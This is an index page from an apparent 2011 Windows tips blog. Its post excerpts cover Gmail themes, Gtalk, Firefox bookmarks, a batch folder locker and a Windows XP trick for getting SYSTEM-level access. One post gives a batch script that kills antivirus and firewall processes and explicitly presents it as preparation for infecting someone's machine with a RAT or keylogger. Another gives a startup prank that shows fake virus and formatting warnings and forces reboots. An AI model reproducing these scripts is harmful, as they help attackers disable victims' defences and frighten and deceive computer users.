Skip to main content

Posts

Showing posts from July, 2011

Customize Gmail theme with your image and colour

There are tons of themes in Gmail to give it a better look as you want. But most of people want to customize it by their own images and colors. But they were forced to use pre define themes of Gmail. Now you can customize your Gmail inbox with your background image and color. Just go to the Themes tab in Settings and choose “Create your own theme.” There, you can select background images for the main area and the footer. choose color and font for text appeared in the inbox too. You can choose any image from your picasa album for inbox background.

Lock your folder without any software

This is a very simple batch file trick. Paste the given code in batch file and save it as with any name.(remember Batch file extension is .bat). Double click on this batch file to create a folder locker. Now you will see a folder name Locker at the same directory of batch file. Put all files which you want to hide in the Locker folder. Double click on this batch file to lock the folder 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder. if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s ...

Run more that one Gtalk on a same computer

This is a simple Gtalk trick by which many users can login in gtalk in a single system without any software or patch. Follow these steps- 1-click on start --> all programs --> Google Talk 2-right click on Google Talk icon and click on properties. 3-In properties dialog box Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /startmenu 4-replace startmenu with nomutex then press OK restart Gtalk and enjoy multiple login.. :)

Restore Suddenly Removed Bookmarks in firefox

Hi reader, today i am going to show you a firefox trick to restore your suddenly removed Firefox bookmarks. 1) Go to Run by pressing win+r or start -> Run. 2) Type "%appdata%\Mozilla\Firefox\Profiles" in RUN dialog box. 3) Open the "xxxx.default" folder (where xxxx can be random numbers and characters). 4) Now open "bookmarkbackups" folder. and you'll get your bookmarks there. 5) Now you can import them in Firefox again. Press Ctrl+Shift+H >> Click on Import and Backup. 6) Then click on Restore. 7) Then Choose File. 8) Then Select your Bookmarks.json File. 9) Finally press open now you've done.

How to disable antivirus using batch file

Hi Friends, Hope you all fine... Today I am gonna post some of the batch programs, To read the past two batch programming tutorial just click below link. When you attempt to hack someone's system by RAT, Keylogger or iStealer then you'll first need to FUD your server but its not that much easy to find a good & free working FUD crypter, So first disable your slave antivirus and firewall. So they can't find out your Trojan virus (Server). The below batch program helps you to disable all the running antivirus in the syste. Just save copy and paste it in notepad file and save it with .bat extension. @ echo off rem -- rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE t...

Fake warning message

This is the fake warming message to make fool your friend: Just go to notepad and paste this in that: @echo off msg * Warning your computer has detected a virus. msg * To remove the virus click OK or close this box msg * Your Hard drives are now being formatted msg * Please wait ........... shutdown -r -c "Rebooting for latest updates." Now save the file as batch file. Now put that file in startup. Now each and every time you start pc the pc will show message and get resarts.

How To Become The SYSTEM User In Windows XP

If you think Administrator has the largest privileges onto the computer, then you are wrong. There is a user who is named SYSTEM. SYSTEM has full control of the operating system and it’s kernel. If you open windows task manager (press ctrl+alt and delete) you will see that System User controls several processes. These processes cannot be closed by Administrator. In this tutorial we will see how to trick Windows into running our desktop as System. So we’ll get a much greater privileges over computer. 1.Open Command Prompt. Go to Start , then Run. In Run option type cmd and click OK. After this will open Command Prompt, or Start->All Programs ->Accessories->Command Prompt 2. In Command Prompt write at 13:55 /interactive “cmd.exe” and press enter , the time is usually a minute or two ahead of your present time in the 24 hours format. After a minute or two will appear new Comand Prompt Window wit different title bar. It has changed from cmd.exe to svchost.exe. 3. End current explo...